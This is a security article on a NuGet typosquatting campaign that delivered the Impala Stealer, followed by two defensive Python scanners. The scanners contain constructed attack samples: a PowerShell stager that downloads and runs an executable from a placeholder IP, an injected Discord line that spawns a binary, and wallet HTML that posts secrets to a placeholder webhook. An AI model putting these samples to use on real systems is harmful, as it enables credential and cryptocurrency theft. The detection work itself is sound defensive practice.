Unmasking the Cryptocurrency Stealer Malware: A Sophisticated Supply Chain Attack on .NET Developers

Recently, cybersecurity researchers uncovered the techniques used in a sophisticated supply chain attack aimed at .NET developers.

The attack employed 13 malicious NuGet packages, which impersonated legitimate packages, to execute PowerShell code and retrieve a follow-on binary from a hard-coded server.


The attack’s ultimate goal was to deploy Impala Stealer, a .NET-based persistent backdoor, to gain unauthorized access to users’ cryptocurrency accounts.

The Typosquatting Campaign

The attackers used typosquatting techniques to distribute a custom malicious payload. By impersonating legitimate packages, they managed to execute PowerShell code on target systems, which retrieved a follow-on binary from a hard-coded server.

What set the campaign apart was an uncommon anti-analysis choice: the payload was built with .NET ahead-of-time (AOT) compilation, which emits native machine code instead of the usual CIL assembly. Standard .NET decompilers recover nothing useful from such a binary, so it is harder to reverse engineer and draws less attention than one wrapped in an off-the-shelf obfuscator.
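The delivery stage above, a lookalike package whose install-time PowerShell fetches a second-stage binary, is something a build pipeline can check for before a restore ever runs. The following is an added example for this article, not JFrog's tooling and not code from the campaign: it opens a .nupkg (a plain zip), lists any PowerShell hooks NuGet would execute from its tools/ folder, greps those hooks for download-and-execute cmdlets, and flags package IDs that are near misses of packages you actually trust. The two sample packages, the TRUSTED list, the 198.51.100.7 address and the 0.85 similarity threshold are all constructed for the example.

```python
"""Audit a .nupkg before restoring it: list the install-time PowerShell hooks it
ships, look for download-and-execute indicators inside them, and flag package IDs
that closely resemble packages the solution actually depends on.

Added example for this article; not JFrog's tooling and not code from the
campaign. The sample packages and the TRUSTED list are constructed inline."""
import io
import re
import zipfile
from difflib import SequenceMatcher

# NuGet runs these scripts from a package's tools/ folder in Visual Studio's
# Package Manager Console (init.ps1 when the solution loads the package,
# install/uninstall.ps1 for legacy packages.config projects). A short
# PowerShell stager that fetches the real payload fits comfortably here.
INSTALL_HOOKS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Cmdlets and switches a downloader/stager typically needs.
STAGER_INDICATORS = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|Start-Process|-EncodedCommand|FromBase64String",
    re.IGNORECASE,
)

# Packages this (hypothetical) solution legitimately depends on.
TRUSTED = ["Newtonsoft.Json", "Microsoft.Extensions.Logging", "Serilog"]


def build_nupkg(pkg_id: str, files: dict) -> bytes:
    """Build a minimal .nupkg (a zip archive) in memory; used to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(f"{pkg_id}.nuspec",
                   f"<package><metadata><id>{pkg_id}</id></metadata></package>")
        for path, body in files.items():
            z.writestr(path, body)
    return buf.getvalue()


def audit_nupkg(pkg_id: str, nupkg: bytes, trusted=TRUSTED, threshold=0.85) -> dict:
    """Return {'hooks': [...], 'indicators': {hook: [matches]}, 'resembles': [...]}."""
    hooks, indicators = [], {}
    with zipfile.ZipFile(io.BytesIO(nupkg)) as z:
        for entry in z.namelist():
            norm = entry.replace("\\", "/").lower()
            if norm not in INSTALL_HOOKS:
                continue
            hooks.append(norm)
            body = z.read(entry).decode("utf-8", errors="replace")
            found = sorted({m.group(0) for m in STAGER_INDICATORS.finditer(body)},
                           key=str.lower)
            if found:
                indicators[norm] = found
    # Similar-but-not-identical IDs are the typosquatting signal; 0.85 is a
    # starting point, tune it against your own dependency list.
    lower = pkg_id.lower()
    resembles = [t for t in trusted if t.lower() != lower
                 and SequenceMatcher(None, lower, t.lower()).ratio() >= threshold]
    return {"hooks": sorted(hooks), "indicators": indicators, "resembles": resembles}


# Constructed samples: a clean library and a lookalike carrying a PowerShell stager.
CLEAN = build_nupkg("Serilog", {"lib/net6.0/Serilog.dll": "MZ..."})
STAGER_PS1 = (
    "$u = 'http://198.51.100.7/update.exe'\n"          # TEST-NET-2 placeholder
    "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\update.exe\n"
    "Start-Process $env:TEMP\\update.exe\n"
)
LOOKALIKE = build_nupkg("Serilogg", {"tools/init.ps1": STAGER_PS1,
                                     "lib/net6.0/Serilogg.dll": "MZ..."})

if __name__ == "__main__":
    for pkg_id, data in (("Serilog", CLEAN), ("Serilogg", LOOKALIKE)):
        print(pkg_id, audit_nupkg(pkg_id, data))
```

Run it over every package in your local NuGet cache or at the feed proxy; a package that ships an install hook at all is worth a look, and one whose hook contains a web request plus a process launch should block the restore. The similarity check is deliberately simple: it catches appended or doubled letters, not homoglyphs or namespace confusion, so pair it with allow-listing of package IDs and a locked-down feed.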

Impala Stealer

The second stage of the attack involved the deployment of Impala Stealer, a .NET-based persistent backdoor, which could gain unauthorized access to users’ cryptocurrency accounts.

The binary carried an auto-update mechanism that fetched newer versions of itself from a remote location. For persistence it injected JavaScript into the Discord or Microsoft Visual Studio Code desktop apps, both Electron applications, so that the injected script ran with the app's own privileges on every launch and restarted the stealer binary.

Exfiltration of Sensitive Data

Once the binary was deployed, it searched for the installation of the Exodus Wallet desktop application and inserted JavaScript code into various HTML files.

This code harvested sensitive data and exfiltrated it to a hard-coded Discord webhook. The snippet itself was fetched at runtime from an online paste site and had already been removed by the time researchers looked, so its exact behaviour could not be confirmed; it is suspected of stealing user credentials and other information of interest.
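Both the persistence mechanism (JavaScript appended to Discord's or VS Code's own app files) and the theft mechanism (script tags and a hard-coded Discord webhook injected into the wallet's HTML) leave the same kind of trace: an application file that no longer matches what the vendor shipped. The following is an added example for this article, not JFrog's tooling and not code from the campaign. It snapshots the SHA-256 of every script and HTML file under an app directory, reports files that drift from that baseline, and greps only those files for the indicators the article describes (a Discord webhook URL, a remote script source, a child_process require, dynamic eval). The directory layout, the paste-site URL, the webhook ID and the file contents are placeholders constructed in a temporary directory.

```python
"""Hunt for the two artifact types described above: JavaScript injected into
Electron desktop apps (Discord, VS Code) that relaunches a stealer, and script
tags or hard-coded Discord webhook URLs injected into a wallet's HTML.

Added example for this article; not JFrog's tooling and not code from the
campaign. App layout, paths, the paste URL and the webhook ID are placeholders."""
import hashlib
import re
import tempfile
from pathlib import Path

SCAN_SUFFIXES = {".js", ".html", ".htm"}

INDICATORS = {
    # Exfiltration channel the stealer used.
    "discord_webhook": re.compile(
        r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I),
    # Snippet pulled from a remote site at page load (the paste-site fetch).
    "remote_script": re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]https?://", re.I),
    # Injected app JS needs a way to start the stealer process.
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
}


def snapshot(root: Path) -> dict:
    """Map every script/HTML file under root (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES}


def changed_files(root: Path, baseline: dict) -> list:
    """Files that are new or whose hash differs from the baseline snapshot."""
    return sorted(rel for rel, digest in snapshot(root).items()
                  if baseline.get(rel) != digest)


def indicators_in(path: Path) -> dict:
    """Indicator name -> distinct matches found in the file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return {name: sorted({m.group(0) for m in rx.finditer(text)})
            for name, rx in INDICATORS.items() if rx.search(text)}


def hunt(root: Path, baseline: dict) -> dict:
    """For each file that drifted from the baseline, the indicators it now contains."""
    return {rel: indicators_in(root / rel) for rel in changed_files(root, baseline)}


def build_demo(root: Path) -> dict:
    """Write clean app files, snapshot them, then tamper with them the way the
    campaign did. Returns the clean baseline. Everything here is constructed."""
    discord_js = root / "Discord/modules/discord_desktop_core/index.js"
    exodus_html = root / "Exodus/app/index.html"
    discord_js.parent.mkdir(parents=True)
    exodus_html.parent.mkdir(parents=True)
    discord_js.write_text("module.exports = require('./core.asar');\n")
    exodus_html.write_text("<html><body><div id='app'></div></body></html>\n")
    baseline = snapshot(root)
    # Persistence: Discord's own startup JS now spawns a binary on every launch.
    with discord_js.open("a") as f:
        f.write("require('child_process').spawn(process.env.LOCALAPPDATA + '/update.exe');\n")
    # Theft: the wallet page loads a remote snippet and posts data to a webhook.
    exodus_html.write_text(
        "<html><body><div id='app'></div>"
        "<script src='https://paste.example.invalid/raw/abc123'></script>"
        "<script>fetch('https://discord.com/api/webhooks/000000000000000000/"
        "placeholder-token', {method: 'POST', body: secrets});</script>"
        "</body></html>\n")
    return baseline


def run_demo() -> dict:
    """Build the demo tree in a temp dir and return hunt() findings for it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        return hunt(root, build_demo(root))


if __name__ == "__main__":
    for rel, hits in run_demo().items():
        print(rel, hits)
```

On a real host, take the baseline from a fresh install or a known-clean machine and point hunt() at the actual app directories. Scanning only drifted files matters: VS Code's and Discord's own bundles legitimately require child_process and are far too large to grep blindly, whereas a file that changed outside of an update and now contains a webhook URL or a remote script source is a strong lead on its own.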

Conclusion

This cryptocurrency stealer combined a cheap delivery technique, typosquatting on NuGet, with an uncommon one, .NET AOT compilation of the payload, to evade detection and reach users' cryptocurrency accounts. The lesson for developers is that restoring a package is code execution: treat dependencies as untrusted input, verify and pin the packages you pull in, and review any install-time scripts they carry.
